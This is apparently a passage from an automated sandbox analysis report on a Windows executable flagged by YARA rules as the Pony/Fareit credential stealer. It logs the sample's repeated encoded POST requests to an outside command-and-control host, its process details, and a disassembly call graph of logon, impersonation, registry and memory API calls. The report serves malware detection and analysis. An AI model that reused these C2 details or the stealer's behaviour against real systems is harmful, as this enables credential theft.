                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:12:51.126099110 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.4497543.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:12:56.146125078 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:12:56.151035070 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:12:56.628221989 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.4497883.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:01.663772106 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:01.668658972 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:13:05.065531969 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.4498423.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:10.082688093 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:10.087496996 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:13:11.483465910 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.4498853.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:16.504730940 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:16.509557009 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:13:16.987520933 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.4499233.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:22.005090952 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:22.010132074 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:13:25.425403118 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.4499733.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:30.442671061 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:30.447506905 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&
                                      Jan 3, 2025 03:13:30.896998882 CET73INHTTP/1.1 405 Method Not Allowed
                                      content-length: 0
                                      connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.4500093.33.130.190807428C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      TimestampBytes transferredDirectionData
                                      Jan 3, 2025 03:13:35.911963940 CET398OUTPOST /forum/viewtopic.php HTTP/1.0
                                      Host: onecable.ca
                                      Accept: */*
                                      Accept-Encoding: identity, *;q=0
                                      Accept-Language: en-US
                                      Content-Length: 183
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      Content-Encoding: binary
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Jan 3, 2025 03:13:35.917876959 CET183OUTData Raw: fd bf 6b e0 72 ec 7a 50 44 f3 a9 71 40 69 9c cd 61 04 fd 52 19 97 6a 3f 87 ad d8 6a aa 14 2f db a4 20 a5 8e d5 3a 22 9b 0c 97 39 92 53 03 7d 52 84 0c 4a 79 7f a3 88 0f 1e eb 83 ae 17 bc b5 35 6a df 21 ee 91 a9 c0 a8 7a fb 37 3a 7d e0 5b c0 b7 9b
                                      Data Ascii: krzPDq@iaRj?j/ :"9S}RJy5j!z7:}[bjckehD/p(dY{QPG3m98Lj*s;\OKGGZh,{E/FHKIFwM5x&


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Target ID:0
                                      Start time:21:11:52
                                      Start date:02/01/2025
                                      Path:C:\Users\user\Desktop\pbfe2Xcxue.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\pbfe2Xcxue.exe"
                                      Imagebase:0x400000
                                      File size:126'464 bytes
                                      MD5 hash:604B748DCA0419D94B618BEB4C5B4710
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: pony, Description: Identify Pony, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                      • Rule: Fareit, Description: Fareit Payload, Source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                      Reputation:low
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:29.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:11.8%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:29
                                        execution_graph 11733 4109c5 GetTickCount 11734 4109da 11733->11734 11735 4109d8 11733->11735 11734->11733 11736 4109e1 ExitProcess 11735->11736 12159 40c845 12160 40c854 12159->12160 12161 40c858 MultiByteToWideChar 12159->12161 12171 40190b LocalAlloc 12161->12171 12163 40c875 MultiByteToWideChar StgOpenStorage 12166 40c8a9 12163->12166 12167 40c91e 12163->12167 12164 4018f4 LocalFree 12165 40c939 12164->12165 12166->12167 12172 40190b LocalAlloc 12166->12172 12167->12164 12169 40c8de 12170 4018f4 LocalFree 12169->12170 12170->12167 12171->12163 12172->12169 11737 410949 SetUnhandledExceptionFilter 11738 410963 11737->11738 11739 410997 11738->11739 11740 410991 RevertToSelf 11738->11740 11747 410577 11739->11747 11740->11739 11742 4109a6 11753 410686 11742->11753 11744 4109ab 11769 4103b4 11744->11769 11746 4109b0 11748 41058e 11747->11748 11751 410590 11747->11751 11748->11742 11749 4105a3 11749->11742 11750 402af7 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 11750->11751 11751->11749 11751->11750 11799 40190b LocalAlloc 11751->11799 11754 41069e 11753->11754 11766 4106a0 11753->11766 11754->11744 11755 4106b3 11755->11744 11756 4106d2 lstrcmpiA 11757 4106e9 LogonUserA 11756->11757 11756->11766 11757->11766 11758 410798 LoadUserProfileA 11758->11766 11759 402a6a 3 API calls 11760 410717 lstrlenA LCMapStringA 11759->11760 11761 41073d LogonUserA 11760->11761 11760->11766 11761->11766 11762 4107fd ImpersonateLoggedOnUser 11762->11766 11763 4018f4 LocalFree 11763->11766 11764 410839 CloseHandle 11764->11766 11765 41082e UnloadUserProfile 11765->11764 11766->11755 11766->11756 11766->11757 11766->11758 11766->11759 11766->11762 11766->11763 11766->11764 11766->11765 11767 410775 LogonUserA 11766->11767 11768 410818 RevertToSelf 11766->11768 11767->11758 11767->11766 11768->11766 11770 4103ca 11769->11770 11771 4103cc 11769->11771 11770->11746 11800 40190b LocalAlloc 11771->11800 11773 4103dc GetTickCount wsprintfA 11801 40190b LocalAlloc 11773->11801 11775 410406 11802 40190b LocalAlloc 11775->11802 11777 41041e 11803 40190b LocalAlloc 11777->11803 11779 410431 GetModuleFileNameA GetTempPathA 11780 410483 CreateFileA 11779->11780 11781 410473 lstrcatA 11779->11781 11782 4104a8 lstrcpyA StrRChrIA 11780->11782 11783 4104ea lstrlenA 11780->11783 11781->11780 11784 4104c3 lstrcpyA 11782->11784 11785 4104cd CreateFileA 11782->11785 11786 40145e WriteFile 11783->11786 11784->11785 11785->11783 11787 410510 11785->11787 11788 410502 CloseHandle 11786->11788 11789 4018f4 LocalFree 11787->11789 11788->11787 11790 410512 wsprintfA LoadLibraryA 11788->11790 11792 41055d 11789->11792 11790->11787 11791 410533 GetProcAddress 11790->11791 11791->11787 11799->11751 11800->11773 11801->11775 11802->11777 11803->11779 11804 40124c CreateFileA 11805 401269 11804->11805 11806 40126d ReadFile 11804->11806 11807 401299 11806->11807 11808 40128b CloseHandle 11806->11808 11807->11806 11809 4012b1 CloseHandle 11807->11809 11824 4e0000 11826 4e001a 11824->11826 11825 4e0059 11826->11825 11827 4e00bc VirtualAlloc 11826->11827 11828 4e00d5 11827->11828 11843 4f00db 11844 4f00e0 11843->11844 11856 4f065f VirtualAlloc 11844->11856 11846 4f00f0 SetFilePointer ReadFile CloseHandle 11848 4f0118 11846->11848 11847 4f013c VirtualProtect VirtualProtect 11850 4f016e 11847->11850 11848->11847 11849 4f01bd 11858 4f0279 11849->11858 11850->11849 11852 4f018c VirtualProtect VirtualProtect 11850->11852 11852->11850 11853 4f01c7 11854 4f0216 VirtualFree 11853->11854 11855 4f021e 11854->11855 11857 4f0683 CreateFileA 11856->11857 11857->11846 11859 4f02fc 11858->11859 11863 4f0289 11858->11863 11859->11853 11860 4f029c LoadLibraryA 11860->11863 11861 4f02ae VirtualProtect 11861->11863 11862 4f02eb VirtualProtect 11862->11863 11863->11859 11863->11860 11863->11861 11863->11862 11864 401016 CreateStreamOnHGlobal 11865 40ff96 11867 40ffa0 11865->11867 11866 40ffb4 11867->11866 11883 401811 GetHGlobalFromStream 11867->11883 11869 40ffcc 11869->11866 11897 4016b1 GetHGlobalFromStream 11869->11897 11871 40ffda 11871->11866 11903 401717 GetHGlobalFromStream 11871->11903 11873 40ffe8 11873->11866 11911 401a63 GetHGlobalFromStream 11873->11911 11875 40fffb 11875->11866 11876 4016b1 3 API calls 11875->11876 11877 410009 11876->11877 11877->11866 11878 401717 3 API calls 11877->11878 11879 410017 11878->11879 11879->11866 11880 41001d 11879->11880 11921 401b28 GetTickCount GetHGlobalFromStream 11880->11921 11882 410025 11882->11866 11884 4018e5 11883->11884 11885 40182e 11883->11885 11884->11869 11886 401836 GlobalLock 11885->11886 11886->11884 11887 401849 11886->11887 11931 40190b LocalAlloc 11887->11931 11889 401862 11932 40190b LocalAlloc 11889->11932 11891 40187b 11892 401891 GlobalUnlock 11891->11892 11893 4018a7 11892->11893 11894 4018f4 LocalFree 11893->11894 11895 4018dd 11894->11895 11896 4018f4 LocalFree 11895->11896 11896->11884 11898 4016ce 11897->11898 11901 4016fb 11897->11901 11899 4016d6 GlobalLock 11898->11899 11900 4016e5 11899->11900 11899->11901 11902 4016f0 GlobalUnlock 11900->11902 11901->11871 11902->11901 11904 401781 11903->11904 11905 401734 11903->11905 11904->11873 11906 401745 GlobalLock 11905->11906 11907 401771 11905->11907 11908 401755 11906->11908 11910 40176f 11906->11910 11907->11873 11909 401760 GlobalUnlock 11908->11909 11909->11910 11910->11873 11912 401a83 11911->11912 11913 401b19 11911->11913 11914 401a8b GlobalLock 11912->11914 11913->11875 11914->11913 11915 401a9a 11914->11915 11933 40190b LocalAlloc 11915->11933 11917 401aa5 11918 401ab6 GlobalUnlock lstrlenA 11917->11918 11919 401ad6 11918->11919 11920 4018f4 LocalFree 11919->11920 11920->11913 11922 401b58 11921->11922 11923 401bed 11921->11923 11924 401b60 GlobalLock 11922->11924 11923->11882 11924->11923 11925 401b6f 11924->11925 11934 40190b LocalAlloc 11925->11934 11931->11889 11932->11891 11933->11917 8751 40fee2 8752 40feea 8751->8752 8755 40fc92 8752->8755 8754 40ff10 8756 40fca9 8755->8756 8757 40fcab GetPEB 8755->8757 8756->8754 8760 40fccd 8757->8760 8758 40fd9b 8758->8754 8760->8758 8842 402448 8760->8842 8846 40692a 8760->8846 8850 40762a 8760->8850 8856 406ca7 8760->8856 8868 40ca27 8760->8868 8876 40fa26 8760->8876 8902 40e220 8760->8902 8912 407a20 8760->8912 8920 407b1f 8760->8920 8934 40eb9d 8760->8934 8938 40de9c 8760->8938 8944 40a51b 8760->8944 8950 408199 8760->8950 8954 406698 8760->8954 8958 40d618 8760->8958 8968 40cd17 8760->8968 8991 406417 8760->8991 9003 409217 8760->9003 9015 404d15 8760->9015 9029 40a08f 8760->9029 9044 40ee0f 8760->9044 9052 40588f 8760->9052 9092 40e88c 8760->9092 9096 40c48c 8760->9096 9100 40c60c 8760->9100 9104 40e38b 8760->9104 9108 408f0b 8760->9108 9141 405d89 8760->9141 9175 405f88 8760->9175 9213 40a008 8760->9213 9221 406107 8760->9221 9229 40e707 8760->9229 9239 40a486 8760->9239 9249 40487d 8760->9249 9275 40d67c 8760->9275 9297 40f37b 8760->9297 9311 40f17a 8760->9311 9317 40c579 8760->9317 9321 40e775 8760->9321 9325 40c4ee 8760->9325 9337 406c6c 8760->9337 9341 4083ec 8760->9341 9347 40ad6a 8760->9347 9355 4080e8 8760->9355 9361 40eb67 8760->9361 9365 4092e7 8760->9365 9373 40a366 8760->9373 9386 40dee5 8760->9386 9390 40cae1 8760->9390 9421 406be1 8760->9421 9431 40a4e0 8760->9431 9435 406fe0 8760->9435 9439 4052e0 8760->9439 9467 40dc5f 8760->9467 9477 40c5db 8760->9477 9481 40a2da 8760->9481 9495 40e159 8760->9495 9501 40d259 8760->9501 9511 405658 8760->9511 9540 407855 8760->9540 9546 40b2d4 8760->9546 9550 40da54 8760->9550 9554 40a253 8760->9554 9562 40ebd3 8760->9562 9588 407352 8760->9588 9630 407951 8760->9630 9640 404ed1 8760->9640 9712 40a1cc 8760->9712 9720 407d4b 8760->9720 9740 4061c9 8760->9740 9746 40cc48 8760->9746 9756 40a145 8760->9756 9764 40c9ae 8760->9764 9772 40e8bd 8760->9772 9776 40c4bd 8760->9776 9780 40ce32 8760->9780 9794 408131 8760->9794 9804 406faf 8760->9804 9808 40ceac 8760->9808 9812 40fb2d 8760->9812 9824 406dac 8760->9824 9828 40c5aa 8760->9828 8843 402451 8842->8843 8844 40245d 8843->8844 9832 4018f4 8843->9832 8844->8760 8847 40693c 8846->8847 9835 4066c9 RegOpenKeyA 8847->9835 8849 40694c 8849->8760 8851 40763c 8850->8851 9861 407448 RegOpenKeyA 8851->9861 8854 407448 14 API calls 8855 407664 8854->8855 8855->8760 8857 406cb9 8856->8857 9872 40461c 8857->9872 8869 40ca39 8868->8869 10172 40c9f0 8869->10172 8872 40c9f0 46 API calls 8873 40ca50 8872->8873 8874 40c9f0 46 API calls 8873->8874 8875 40ca5a 8874->8875 8875->8760 8877 40fa38 8876->8877 10181 40f9d4 8877->10181 8882 401e34 5 API calls 8883 40fa8d 8882->8883 10195 40f692 RegOpenKeyA 8883->10195 8886 4018f4 LocalFree 8887 40faa7 8886->8887 8888 401dad 6 API calls 8887->8888 8889 40fabd 8888->8889 8890 40fae1 8889->8890 8891 401e88 6 API calls 8889->8891 8892 40f5f5 23 API calls 8890->8892 8893 40facc 8891->8893 8894 40faf4 8892->8894 8895 40f5f5 23 API calls 8893->8895 8896 40f692 26 API calls 8894->8896 8897 40fadc 8895->8897 8898 40fb09 8896->8898 8900 4018f4 LocalFree 8897->8900 8899 40f692 26 API calls 8898->8899 8900->8890 8903 40e232 8902->8903 8904 401dad 6 API calls 8903->8904 8905 40e24c 8904->8905 8906 40e269 8905->8906 8908 4045d1 41 API calls 8905->8908 8907 40461c 46 API calls 8906->8907 8911 40e280 8907->8911 8909 40e264 8908->8909 8910 4018f4 LocalFree 8909->8910 8910->8906 8911->8760 8913 407a32 8912->8913 10276 4079bf 8913->10276 8916 4079bf 46 API calls 8917 407a49 8916->8917 8918 4079bf 46 API calls 8917->8918 8919 407a53 8918->8919 8919->8760 8921 407b31 8920->8921 10289 407a62 8921->10289 8924 407a62 29 API calls 8925 407b4c 8924->8925 8926 407a62 29 API calls 8925->8926 8927 407b58 8926->8927 8928 407a62 29 API calls 8927->8928 8929 407b67 8928->8929 8930 407a62 29 API calls 8929->8930 8931 407b76 8930->8931 8932 407a62 29 API calls 8931->8932 8933 407b85 8932->8933 8933->8760 8935 40ebaf 8934->8935 10320 40eb29 8935->10320 8937 40ebc4 8937->8760 8939 40deae 8938->8939 10343 40dcb8 RegOpenKeyA 8939->10343 8942 40dcb8 14 API calls 8943 40ded6 8942->8943 8943->8760 8945 40a52d 8944->8945 8946 40461c 46 API calls 8945->8946 8947 40a547 8946->8947 8948 40461c 46 API calls 8947->8948 8949 40a55e 8948->8949 8949->8760 8951 4081ab 8950->8951 8952 40461c 46 API calls 8951->8952 8953 4081c5 8952->8953 8953->8760 8955 4066aa 8954->8955 10354 4064b0 RegOpenKeyA 8955->10354 8957 4066ba 8957->8760 8959 40d62a 8958->8959 10365 40d330 RegOpenKeyA 8959->10365 8962 40d330 16 API calls 8963 40d652 8962->8963 10377 40d589 8963->10377 8966 40d589 21 API calls 8967 40d66d 8966->8967 8967->8760 8969 40cd2a 8968->8969 8970 40cd78 8969->8970 8971 40cd38 StrStrIA 8969->8971 8980 4045d1 41 API calls 8969->8980 8985 4018f4 LocalFree 8969->8985 10387 402469 8969->10387 8972 401eed 7 API calls 8970->8972 8971->8969 8973 40cd7f 8972->8973 8975 40cda7 8973->8975 8976 401e88 6 API calls 8973->8976 8977 401eed 7 API calls 8975->8977 8978 40cd8e 8976->8978 8979 40cdae 8977->8979 8981 4045d1 41 API calls 8978->8981 8982 40cdd6 8979->8982 8984 401e88 6 API calls 8979->8984 8980->8969 8983 40cda2 8981->8983 8982->8760 8986 4018f4 LocalFree 8983->8986 8987 40cdbd 8984->8987 8985->8969 8986->8975 8988 4045d1 41 API calls 8987->8988 8989 40cdd1 8988->8989 8990 4018f4 LocalFree 8989->8990 8990->8982 8992 406429 8991->8992 8993 401dad 6 API calls 8992->8993 8996 406445 8993->8996 8994 406460 8995 401dad 6 API calls 8994->8995 8997 406479 8995->8997 8996->8994 8998 4018f4 LocalFree 8996->8998 8999 406494 8997->8999 9002 4018f4 LocalFree 8997->9002 8998->8994 10397 406218 RegOpenKeyA 8999->10397 9001 4064a1 9001->8760 9002->8999 9004 409229 9003->9004 9005 40461c 46 API calls 9004->9005 9006 409243 9005->9006 10407 408fe6 RegOpenKeyA 9006->10407 9009 408fe6 14 API calls 9010 409268 9009->9010 10418 4090d5 RegOpenKeyA 9010->10418 9013 4090d5 53 API calls 9014 40928c 9013->9014 9014->8760 9016 404d27 9015->9016 10442 404b9b RegOpenKeyA 9016->10442 9019 404b9b 14 API calls 9020 404d44 9019->9020 9021 404b9b 14 API calls 9020->9021 9022 404d51 9021->9022 10453 404a8d RegOpenKeyA 9022->10453 9025 404a8d 10 API calls 9026 404d6b 9025->9026 9027 404a8d 10 API calls 9026->9027 9028 404d78 9027->9028 9028->8760 9030 40a0a4 9029->9030 9031 401eed 7 API calls 9030->9031 9032 40a0ae 9031->9032 9033 40a0d6 GetCurrentDirectoryA 9032->9033 9035 401e88 6 API calls 9032->9035 10462 409f00 StrStrIA 9033->10462 9037 40a0bd 9035->9037 9039 4045d1 41 API calls 9037->9039 9038 409f00 83 API calls 9040 40a12a SetCurrentDirectoryA 9038->9040 9041 40a0d1 9039->9041 9042 40a141 9040->9042 9043 4018f4 LocalFree 9041->9043 9042->8760 9043->9033 9045 40ee21 9044->9045 10671 40ecc5 9045->10671 9048 40ecc5 49 API calls 9049 40ee49 9048->9049 9050 40461c 46 API calls 9049->9050 9051 40ee60 9050->9051 9051->8760 9053 4058a1 9052->9053 10689 40576a 9053->10689 9056 40576a 24 API calls 9057 4058f0 9056->9057 9058 40576a 24 API calls 9057->9058 9059 405908 9058->9059 9060 40576a 24 API calls 9059->9060 9061 405920 9060->9061 9062 40576a 24 API calls 9061->9062 9063 405938 9062->9063 9064 40576a 24 API calls 9063->9064 9065 405950 9064->9065 9066 40576a 24 API calls 9065->9066 9067 405968 9066->9067 9068 40576a 24 API calls 9067->9068 9069 405980 9068->9069 9093 40e89e 9092->9093 10736 40e824 9093->10736 9095 40e8ae 9095->8760 9097 40c49e 9096->9097 10748 40c3fb 9097->10748 9099 40c4ae 9099->8760 9101 40c61e 9100->9101 9102 40c3fb 46 API calls 9101->9102 9103 40c62e 9102->9103 9103->8760 9105 40e39d 9104->9105 9106 40c3fb 46 API calls 9105->9106 9107 40e3ad 9106->9107 9107->8760 9109 408f1d 9108->9109 10770 408ee9 9109->10770 9112 408ee9 49 API calls 9113 408f34 9112->9113 9114 408ee9 49 API calls 9113->9114 9115 408f3e 9114->9115 9116 401dad 6 API calls 9115->9116 9117 408f55 9116->9117 9118 408f59 9117->9118 9119 408f6d 9117->9119 10777 408c29 9118->10777 9121 401dad 6 API calls 9119->9121 9123 408f84 9121->9123 9125 408f88 9123->9125 9126 408f9c 9123->9126 9124 4018f4 LocalFree 9124->9119 9127 408c29 38 API calls 9125->9127 9128 401dad 6 API calls 9126->9128 9129 408f97 9127->9129 9130 408faf 9128->9130 9131 4018f4 LocalFree 9129->9131 9132 408fd7 9130->9132 9133 402469 9 API calls 9130->9133 9131->9126 9132->8760 9134 408fba 9133->9134 9142 405d9b 9141->9142 10910 405c62 9142->10910 9176 405f9a 9175->9176 9177 401dad 6 API calls 9176->9177 9178 405fb4 9177->9178 9179 405fcc 9178->9179 9181 4042ec 16 API calls 9178->9181 9180 401dad 6 API calls 9179->9180 9182 405fe3 9180->9182 9183 405fc7 9181->9183 9184 405ffb 9182->9184 9186 4042ec 16 API calls 9182->9186 9185 4018f4 LocalFree 9183->9185 9187 401dad 6 API calls 9184->9187 9185->9179 9188 405ff6 9186->9188 9189 406012 9187->9189 9190 4018f4 LocalFree 9188->9190 9191 406025 9189->9191 10999 405f2a 9189->10999 9190->9184 9193 401dad 6 API calls 9191->9193 9195 40603c 9193->9195 9196 40604f 9195->9196 9198 405f2a 41 API calls 9195->9198 9199 401dad 6 API calls 9196->9199 9197 4018f4 LocalFree 9197->9191 9200 40604a 9198->9200 9201 406066 9199->9201 9202 4018f4 LocalFree 9200->9202 9203 406079 9201->9203 9204 405f2a 41 API calls 9201->9204 9202->9196 10990 405f5b 9203->10990 